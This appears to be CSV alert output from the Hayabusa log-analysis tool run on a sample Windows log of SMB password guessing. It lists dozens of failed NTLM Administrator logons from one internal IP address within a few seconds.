2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JKth56VEMqMCgwG9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TCGlvOFFkVpSHSoM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmLxSIastsvqdJC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPyvUDHHWzbhyvZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 
01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7dF4fIlAvIBYiw0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPDPtH2m9TgW8Khg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AChGHCNom0ds5ujV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8sLQI4KGgQRq2Sy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dqeLFLRT5EXiCBUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dx3tco9up7XnOa7h | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZdNX4ubtpQaV9EeF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S05I0ZlGKGazkVkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzbfrYSYhxH6WcCt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGTvXs8Mlc0Fi7iT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1LjtTFjPfPlBqAi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 1lhJW3iO1xGGTMhp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMz7WmlBTgadVgN8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OB02epCA5pc5oBeJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KAFgReUMtu9VerRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ByeL26yQfohpQT3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 527r3nh9ocmItXfL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNeC1BBFVXv839Ys | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: juXXpQcoPfJLMQ3L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: njNdv4lGnsUpooCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j6VchLhWJT7cCWVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r3xxnFpbd8zkFm0h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtf156NEpOebQHGC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17O1jfGX6KQMPgnD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NaqTqrCiPPfNxZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Az7cwIWXUGVIMTv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Djaxf99PVs2VkMy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbTSoTdaQ0Y4c9Gw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: g9aTo4QBHfrgPYZ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dpHKjYzZTn0ruIrf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HqhPnV6tc8airRqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RIOCqtXh5ji12U5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwuGZ0kgg1yToLlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZSBbd4qBRuzeKBjD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zS1Muxc9gpcqv23 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c6wiIkfkgtso42P1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1ilRmhSB5RfvpVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PuQ47GGBraimypWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UfUsAYWilbwMScpE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22ZSltGNwIl0DNDM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IYwG9IUpdk5DmM8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a8kbGxQFHDBodGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KoLqIaO8p3k9kOkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUnonSx3ZBdkyGhu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1QJziwKhsaJljGV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: ZhcNRrpODYB9jZxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yi5JE53caVn7n54w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jx6qTASzFp830ud6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4L8HtBWlmAMTjCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4hVfTwibHreepku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3TlapK211UT8SO0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mzzw3uPkn2cgtmlF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aPnfUjwJei5E5BD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mm1k0eeKAYokIbDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w8TDNcJ3LMyNtUe1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogKKslkdXvc9f130 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgoy6gMfe5N0UiP5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfjf3d6I8TsBOzvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vs8DG8s81oOwYoI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LFkgN1aDoYkQ4qrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KMwLokYpcFIYHegd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oKradBV4ERsQnKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 0qPzlzfmgrbYTKqQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKYlBm2lhobHzbjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBMu96oqO9tb3f4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO04Q3eYdzyuy51v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FrIa2UrSrfdhkDCx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axhhyMrGl95O16Vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atjvfi8QeEDluhL2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HPBZKUiiKeyQwSr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2SmitfyjO4mxqw5E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 